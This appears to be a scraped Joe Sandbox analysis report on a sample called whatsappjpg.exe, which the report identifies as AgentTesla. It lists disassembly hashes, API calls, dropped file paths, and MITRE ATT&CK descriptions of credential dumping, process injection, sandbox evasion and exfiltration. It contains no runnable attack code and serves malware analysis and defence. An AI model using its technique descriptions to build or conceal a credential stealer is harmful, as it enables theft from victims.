Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48

Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45

Function 0040638E Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54

Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48

Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44

Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report whatsappjpg.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Settings.ini

C:\Users\user\AppData\Local\Temp\nsc8B5F.tmp

C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll

C:\Users\user\Uploadable\normallnnens\660.jpg

C:\Users\user\Uploadable\normallnnens\Editere.ter

C:\Users\user\Uploadable\normallnnens\Wodewose235.enc

C:\Users\user\Uploadable\normallnnens\dharma.txt

C:\Users\user\Uploadable\normallnnens\howadji.Pte

C:\Users\user\Uploadable\normallnnens\shears.sip

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
whatsappjpg.exe

Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Function 004052D1 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405F0A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00403C55 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Function 00402DBA Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Function 0040232F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Function 10001771 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
fileCOMMON

Function 00405DB5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre